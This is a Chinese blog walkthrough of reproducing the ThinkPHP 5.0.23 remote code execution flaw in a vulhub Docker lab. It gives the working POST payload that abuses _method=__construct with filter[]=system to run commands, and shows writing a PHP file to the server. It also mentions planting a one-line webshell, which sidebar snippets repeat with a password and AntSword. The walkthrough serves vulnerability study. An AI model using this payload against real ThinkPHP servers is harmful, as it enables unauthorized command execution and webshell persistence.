Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

最新推荐文章于 2024-03-01 00:46:26 发布
最新推荐文章于 2024-03-01 00:46:26 发布
阅读量389 收藏 1
点赞数
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59405467/article/details/132137278
版权

目录

漏洞详情

漏洞利用

漏洞复现

拉取环境

Ip登录

Burp抓包

phpinfo

复现完成

漏洞详情

 框架介绍:

ThinkPHP是一款运用极广的PHP开发框架。

漏洞引入:

 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞利用

1、访问靶机地址+端口号 进入首页

2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。

漏洞复现

先进入

vulhub/thinkphp/5.0.23-rce

然后

拉取环境

systemctl start docker

systemctl stop firewalld.service

docker-compose up -d

Ip登录

 

Burp抓包

修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。

在pwd部分尝试写入

phpinfo

echo "<?php phpinfo(); ?>" > info.php

发送

关掉代理 进入info.php发现被解析

后续可以写入一句话木马拿shell

复现完成

Tender…
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
thinkphp5.0.23漏洞复现以及脚本编写
weixin_45653478的博客
04-26 788
ThinkPHP5.0.23漏洞主要涉及远程代码执行RCE)的安全隐患。这一漏洞的存在是因为ThinkPHP框架在底层对控制器名的过滤不够严格,导致攻击者有可能通过特定的URL构造,调用到框架内部的敏感函数,进而执行任意命令。
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
ThinkPHP 清理缓存最新TP5.0/6.0有效完全代码
05-30
ThinkPHP 清理缓存最新TP5.0/6.0有效完全代码 , 1 . 清除模版缓存 不删除cache目录 。。。。 2 . 清除模版缓存 不删除 temp目录 。。。 3 . 清除日志缓存 不删出log目录 使用循环方式获取所以有效的文件夹
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2370
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
phpunit 远程代码执行漏洞(CVE-2017-9841)
这周末在做梦的博客
12-21 2601
本次分享内容为蓝帽杯中web-php的一道题目中的关键漏洞,由于本人技术不够成熟,无法进行完全的复现,还请见谅。 一,漏洞概述: PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。 二,漏洞版本: 4.8.19 ~ 4.8.27、 5.0.10 ~ 5
Thinkphp框架漏洞--->5.0.23 RCE
最新发布
huohaowen的博客
03-01 1368
本篇文章来讲一下thinkphp的框架漏洞
Thinkphp5.0.23远程命令执行
Cover-3321的博客
01-03 1829
thinkphp远程命令执行漏洞 php的一个开发框架,5,0.23及以前的版本中,获取method的方法中没有正确处理方法 名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行
ThinkPHP5 基础要点(学习框架ING)
lian_ge的博客
07-23 194
基础要点: ThnikPHP5.0 版本的默认自带的入口文件位于 public/index.php,实际部署的时候 public 目录为你的应用对外访问目录 5.0 版本采用模块化的设计架构,默认的应用目录下面只有一个 index 模块目录。如果要添加新的模块可以使用控制台命令生成。 步骤:首先按 window 键 + x键打开命令行模式,然后输出 D: 进入D 盘(我保存在 ...
PHP解析二维码内容
m0_47005349的博客
09-18 422
通过composer安装资源包: composer require khanamiryan/qrcode-detector-decoder 使用方法: use Zxing\QrReader; $qrcode = new QrReader("二维码地址"); $text = $qrcode->text();
thinkphp v5.0.23 rce
qq_43647462的博客
08-23 3485
thinkphp v5.0.23 rce 复现 Buchiyexiao. thinkphp是一个轻量级的框架,其中在thinkphp5版本中出现了很多命令执行漏洞,本文分析采用的代码使用的是thinkphp版本v5.0.23(目的是匹配docker搭建的thinkphp环境的版本) 漏洞位置 thinkphp5的主要漏洞位置位于处理请求的Request类中,其中存在method方法,简单阅读发现该方法目的是为了获取当前的请求类型,因为我没有传入任何请求,所以get,post等的数组为空 其中var
深入理解PHP错误:Undefined constant
奇妙的Bug之旅
11-07 1736
其中,"Error: Undefined constant"是一个常见的错误,它表示我们在代码中使用了一个未定义的常量。当我们在PHP代码中遇到"Error: Undefined constant"错误时,我们需要首先理解这个错误的含义。然而,由于这个常量没有被声明和初始化,所以PHP会抛出一个"Error: Undefined constant"错误。现在,当我们尝试输出这个常量时,PHP就不会再抛出错误了。一旦我们发现了一个未定义的常量,我们就可以通过声明和初始化这个常量来修复这个错误。
【转】ThnikPHP成功失败处理页面$this->success()和$this->error()
weixin_30711917的博客
08-12 278
在控制器方法内,有以下代码:$this->error('错误信息');输出的提示信息如下:[ 错误信息 ]模板不存在[E:\wwwroot\think/Myapp/Tpl/default/Public/success.html]我在Tpl/default/Public/下建立模板文件error.html,但是请注意:这里提示的是"success.html"模板文件不存在。不知道这是什么原因...
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 7695
ThinkPHP5系列远程代码执行漏洞复现(详细)
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1817
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tender…

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值